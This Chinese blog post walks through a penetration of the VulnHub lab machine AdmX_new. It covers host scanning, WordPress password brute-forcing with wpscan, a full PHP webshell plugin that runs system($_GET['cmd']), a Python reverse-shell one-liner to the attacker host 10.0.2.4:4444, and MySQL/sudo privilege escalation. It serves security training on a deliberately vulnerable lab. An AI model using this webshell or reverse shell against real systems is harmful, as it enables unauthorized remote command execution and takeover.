AdmX_new靶机渗透过程

已于 2022-04-02 17:57:16 修改
阅读量4.9k 收藏 5
点赞数 20
分类专栏: 渗透 文章标签: web安全
于 2022-04-02 17:01:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36025144/article/details/123920850
版权

靶机渗透 WordPress 密码爆破 MySQL提权 webshell
关键词由CSDN通过智能技术生成

文章目录

前言

靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z
难度:中(2个flag和root权限)
kali:10.0.2.4
靶机:10.0.2.7 192.168.159.145

一、主机发现/端口扫描

sudo nmap -sn 10.0.2.0/24
在这里插入图片描述sudo nmap -p- 10.0.2.7
在这里插入图片描述

访问10.0.2.7

在这里插入图片描述

二、路径爆破/匹配替换

dirb http://10.0.2.7  发现http://10.0.2.7/wordpress

在这里插入图片描述

使用burpsuit抓包发现地址会跳转到192.168.159.145
进入Options进行替换,刷新页面

在这里插入图片描述在这里插入图片描述

利用wpscan探测出用户名admin,进入到wordpress/wp-login.php登陆页面

wpscan --url http://10.0.2.7/wordpress --enumerate

在这里插入图片描述

三、密码爆破获得admin密码

wpscan --url http://10.0.2.7/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述

四、漏洞利用

在这里上传编写好的代码,将文件压缩成zip进行上传

在这里插入图片描述

<?php

/**

 * Plugin Name:Webshell

 * Plugin URI:https//yuanfh.github.io

 * Description:WP Webshell for Pentest

 * Version:1.0

 * Author:yuanfh

 * Author URI:https://yuanfh.github.io

 * License:https://yuanfh.github.io

 */

if(isset($_GET['cmd']))

    {

	    system($_GET['cmd']);

    }

?>

在这里插入图片描述

尝试访问http://10.0.2.7/wordpress/wp-content/plugins/shell.php?cmd=id

在这里插入图片描述

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(["/bin/bash"])'

在这里插入图片描述

第一个flag获取成功,当前为wpadmin用户权限,需要进一步提权

在这里插入图片描述

五、密码重用/MySQL提权

可以看到在不需要密码的情况下执行/usr/bin/mysql -u root -D wordpress -p命令获得的是root权限

在这里插入图片描述

执行命令,尝试adam14密码成功获取操作系统root权限

在这里插入图片描述

获取到root目录下第二个flag

在这里插入图片描述

总结

以上就是今天要讲的内容,本文简单讲述了AdmX_new靶机渗透过程,中间也可以使用更自动化的msf。修改404.php文件加入一句话木马,也可以使用蚁剑连接进行进一步操作。

涉及到的攻击方法

  • 主机发现
  • 端口扫描
  • WEB路径爆破
  • BP自动替换
  • 密码爆破
  • Wordpress漏洞利用
  • NC反弹Shell升级
  • 利用MySQL提权
  • 另类提权方法
皮皮鲁xx
关注
  • 20
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
t6AdmX_new靶机
08-03
t6AdmX_new靶机
Windows ADMX/ADML
08-05
包括 Windows 8.1 及以上,Windows Server 2012 R2 及以上,所有 Windows 系统的 ADMX/ADML 模板文件,用于部署组策略管理模板。参考文档: https://mp.csdn.net/mp_blog/creation/editor/126182767。
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2468
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
AdmX_new靶机
weixin_45691672的博客
06-16 611
实验主机:AdmX_new靶机一台/Kali linux攻击机一台AdmX_new靶机 IP:192.168.3.9Kali linux攻击机 IP:192.168.3.32实验网络:桥接模式实验目标:获取靶机的Root权限。
vulnhub靶机--AdmX_new
weixin_46107179的博客
04-08 3943
靶机下载地址:靶机下载 主机发现 通过nmap扫描得到主机IP地址 信息搜集 通过nmap对IP地址扫描,得到信息,只有80端口 然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url 于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip 需要通过burpsuite里面的proxy模块的options功能,将其响应头
kali之vulnhub,Admx_new
weixin_54431413的博客
05-11 658
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
Admx_new
果粒程
11-22 384
Admx_new
AdmX_new靶场
zjxxxy的博客
06-15 169
vulnhub靶场AdmX_new攻略
Admx_new靶机之BurpSuite内容替换、MSF漏洞利用、Wordpress后台漏洞利用、蚁剑上线、利用MySQL提权
qq_40898302的博客
05-12 543
1) Ctrl + Z 将shell放置后台 2) 输入 stty raw -echo 3) 输入 fg 将后台进程调用到前台 4) 关闭所有程序 5) 确定kali有bash ls /bin/bash 6) 将 zsh 改成 bsh sudo chsh -s /bin/bash 7) 重启 8) 输入 echo $SHELL 显示 /bin/bash 成功 9) 重新监听。有的系统漏洞只能触发一次,所以打点成功,基于这个shell获取更多的shell,利用多种方式,多种途径去获得更多的shell。
horizon vdm_agent.admx代理组策略模板
12-05
【标题】"Horizon VDM-Agent.admx代理组策略模板"是Vmware云桌面解决方案中的一个重要组成部分,主要用于管理和配置Horizon View桌面虚拟机的行为。这个模板适用于Horizon 7.3.2及其以下版本,虽然它可能也兼容更高...
EvergreenAdmx:使Admx文件保持最新状态的脚本
05-27
长荣Admx 部署了多个Windows Virtual Desktop环境后,我决定不再希望手动下载所需的Admx文件,而是想要一种使它们保持最新状态的方法。 该脚本解决了两个问题。 检查存在的Admx文件的较新版本,并在找到新版本时进行...
policy_templates.zip
05-13
policy_templates中有3个目录:chromeos、通用(包含带有所有Chrome策略设置的完整说明的html文件、indows –包含两种格式的Chrome策略模板:ADM和ADMXadmx是较新的管理策略格式)
AdmX_new
qq_45747465的博客
06-15 173
靶机--AdmX_new
vulhub之AdmX_new
qq_48746414的博客
06-12 708
记一次vulhub靶场过程
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 216
BP自动替换、另类提权方法
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1327
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
Vulnhun_ADMX: 1.0.1
qq_45434762的博客
05-16 371
主机信息kali: 192.168.254.135 ADMX:: 192.168.254.159 信息收集通过nmap扫描目标主机发现只开放了80端口nmap -T4 -p- -A -v...
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 249
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
apphvsi.admx
09-01
apphvsi.admx是一种用于管理应用虚拟化的Windows组策略模板文件。组策略是Windows操作系统中的一种集中管理和配置计算机和用户设置的工具。使用apphvsi.admx文件,管理员可以在组策略中定义和配置应用虚拟化相关的设置。 应用虚拟化是一种将应用程序从操作系统上物理安装到一个虚拟化容器中运行的技术。它可以使应用程序之间相互隔离,提高应用程序的兼容性和安全性。通过使用apphvsi.admx文件,管理员可以自定义虚拟化容器的设置,如文件访问权限、注册表访问权限、网络访问权限等。这样,管理员可以根据组织的需求和安全策略,精确控制应用程序的行为和访问权限。 通过组策略管理apphvsi.admx文件,管理员可以将相关的设置应用到特定的计算机或用户上。这样,管理员可以集中管理和配置应用虚拟化的设置,而不需要手动在每台计算机上进行配置。通过组策略,管理员可以快速、简便地将更改应用到整个组织中的计算机或用户。 总而言之,apphvsi.admx是一种管理应用虚拟化设置的Windows组策略模板文件,通过它可以实现对应用虚拟化的精确控制和集中管理。这对于组织来说,能够提高应用程序的兼容性、安全性,并简化管理工作。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

皮皮鲁xx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值